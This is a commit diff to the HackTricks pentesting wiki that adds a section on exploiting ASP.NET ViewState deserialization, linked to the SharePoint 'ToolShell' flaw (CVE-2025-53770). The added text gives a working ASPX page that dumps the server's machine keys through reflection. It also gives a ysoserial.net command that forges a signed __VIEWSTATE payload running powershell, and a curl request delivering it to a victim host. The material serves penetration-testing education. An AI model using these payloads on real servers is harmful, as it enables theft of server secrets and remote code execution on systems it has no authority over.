Merge pull request #1165 from HackTricks-wiki/update_SharePoint_0-day_uncovered__CVE-2025-53770__20250721_124850

SharePoint 0-day uncovered (CVE-2025-53770)

Author: carlospolop

src/pentesting-web/deserialization/exploiting-__viewstate-parameter.md

@@ -202,12 +202,48 @@ For all the test cases, if the ViewState YSoSerial.Net payload works **successfu
 
 Check for [further information here](<https://github.com/carlospolop/hacktricks/blob/master/pentesting-web/deserialization/[**https:/www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/**](https:/www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/)/README.md>)
 
+### Dumping ASP.NET Machine Keys via Reflection (SharPyShell/SharePoint ToolShell)
+
+Attackers who are able to **upload or execute arbitrary ASPX code** inside the target web root can directly retrieve the secret keys that protect `__VIEWSTATE` instead of bruteforcing them.  
+A minimal payload that leaks the keys leverages internal .NET classes through reflection:
+
+```csharp
+<%@ Import Namespace="System.Web.Configuration" %>
+<%@ Import Namespace="System.Reflection" %>
+<script runat="server">
+public void Page_Load(object sender, EventArgs e)
+{
+    var asm = Assembly.Load("System.Web");
+    var sect = asm.GetType("System.Web.Configuration.MachineKeySection");
+    var m = sect.GetMethod("GetApplicationConfig", BindingFlags.Static | BindingFlags.NonPublic);
+    var cfg = (MachineKeySection)m.Invoke(null, null);
+    // Output: ValidationKey|DecryptionKey|Algorithm|CompatibilityMode
+    Response.Write($"{cfg.ValidationKey}|{cfg.DecryptionKey}|{cfg.Decryption}|{cfg.CompatibilityMode}");
+}
+</script>
+```
+
+Requesting the page prints the **ValidationKey**, **DecryptionKey**, the encryption algorithm and the ASP.NET compatibility mode. These values can now be fed straight into **ysoserial.net** to create a valid, signed `__VIEWSTATE` gadget:
+
+```bash
+ysoserial.exe -p ViewState -g TypeConfuseDelegate \
+  -c "powershell -nop -c \"whoami\"" \
+  --generator=<VIEWSTATE_GENERATOR> \
+  --validationkey=<VALIDATION_KEY> --validationalg=<VALIDATION_ALG> \
+  --decryptionkey=<DECRYPTION_KEY> --decryptionalg=<DECRYPTION_ALG> \
+  --islegacy --minify
+curl "http://victim/page.aspx?__VIEWSTATE=<PAYLOAD>"
+```
+
+This **key-exfiltration primitive** was mass-exploited against on-prem SharePoint servers in 2025 ("ToolShell" – CVE-2025-53770/53771), but it is applicable to any ASP.NET application where an attacker can run server-side code.
+
 ## References
 
 - [**https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/**](https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/)
 - [**https://medium.com/@swapneildash/deep-dive-into-net-viewstate-deserialization-and-its-exploitation-54bf5b788817**](https://medium.com/@swapneildash/deep-dive-into-net-viewstate-deserialization-and-its-exploitation-54bf5b788817)
 - [**https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/**](https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/)
 - [**https://blog.blacklanternsecurity.com/p/introducing-badsecrets**](https://blog.blacklanternsecurity.com/p/introducing-badsecrets)
+- [SharePoint “ToolShell” exploitation chain (Eye Security, 2025)](https://research.eye.security/sharepoint-under-siege/)